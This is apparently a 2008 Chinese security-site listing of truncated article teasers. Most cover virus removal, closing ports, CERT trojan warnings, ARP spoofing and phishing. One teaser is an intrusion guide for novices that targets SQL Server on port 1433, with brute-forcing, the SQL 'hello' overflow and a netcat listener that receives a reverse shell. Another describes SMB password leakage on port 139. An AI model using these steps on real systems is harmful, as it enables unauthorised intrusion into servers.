安装天网后，它默认是不防网页病毒的，现在跟大家公布一个方法，可以让天网挡住当前流行的一大部分网页病毒。 一、先上线并打开天网。 二、在桌面依次点鼠标右键选择：新建——快捷方式——然后输入如下内容： hh.exe "http://www.baidu.com" 三、在桌面依次点鼠标右键...

2008-02-23 07:15:11

我这几天突然发现，我的机器上出现了6个SVCHOST进程。经过我的仔细查看，有个进程用了我很多内存。我搜查了下WINDOWS文件夹，居然找出2个SVCHOST.EXE：一个是windowsSVCHOST.EXE(病毒)，另一个则是WINDOWSSYSTEM32SVCHOST.EXE(正常的)。 因为SVCHOST.EXE是在WINDOWS...

2008-02-23 07:15:09

国家计算机病毒应急处理中心通过互联网监测发现，近期一些局域网络中的计算机用户感染了一种叫“美女游戏”的木马程序。该恶意木马程序通过移动U盘进行传播，在受感染的移动U盘里会生成两个病毒文件。计算机用户如果使用这个受感染的移动U盘进行数据存储或是交换，那么...

2008-02-23 07:15:11

大致的敏感端口有:23、135、137-139、445、1433、3389等等。 23端口关闭大法:开始-运行-CMD.net stop telnet; 135端口关闭大法:控制面版-管理工具-服务-找到 remote procedure call(rpc)右击-属性-服务状态-禁用，OK; 137-138.445端口关闭大法:右击-网上邻居-属性/本地...

2008-02-23 07:15:10

前段时间有个同事说他的诺顿不停的出现高危警报对话框，关闭了又弹出，反复如此，严重影响了他的工作，请我帮忙检查一下是不是中了病毒。 我看了警报上提示的内容，是一个名为Infostealer.Gampass的病毒。从名字上看，应该是个盗取游戏密码的病毒，从现象上看，好像对...

2008-02-23 07:15:06

希望对新手入侵有帮助! 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以...

2008-02-23 07:15:07

Windows访问139端口时自动用当前用户、密码连接，造成泄露用户密码，虽然其密码是加密的，但一样可以用来攻击。 下面是SMB的密码认证方式。 WINDOWS的139口的访问过程，箭头表示数据方向： 1.客户端--------------------建立TCP连接-----------------服务端 2.客户端--...

2008-02-23 07:15:03

我仍然记得我在AOL帐户下收到的第一封钓鱼邮件，说我中了AOL的彩票！虽然听起来很令人欣喜，但我还是感到有些怀疑。没有多想，我打开这封电子邮件并点击了里面的链接，看看我是否真的成为了百万富翁。而那一瞬间，我的计算机死机了，而之后每次重启都仍然会导致计算机...

2008-02-23 07:15:06

国家计算机病毒应急处理中心通过对互联网监测发现，近期一些局域网中的计算机系统受到一种“地址解析协议欺骗”(简称ARP欺骗)的恶意木马程序的入侵破坏，严重影响了局域网中用户计算机系统的正常运行。 专家说，如果进行“ARP欺骗”的恶意木马程序入侵某个局域网中的计...

2008-02-23 07:15:02

电脑病毒总是突如其来、在我们不经意的时候光顾，而它们经常是通过我们非常熟悉且为之做好准备的方式来访。好像两年前，在宏病毒盛行的时代，美丽莎(Melissa)病毒借助Word宏疯狂肆虐了一把。而在蠕虫病毒频频闹事之际，爱虫（ILOVEYOU）病毒在Outlook地址簿上搜索到联...

2008-02-23 07:15:01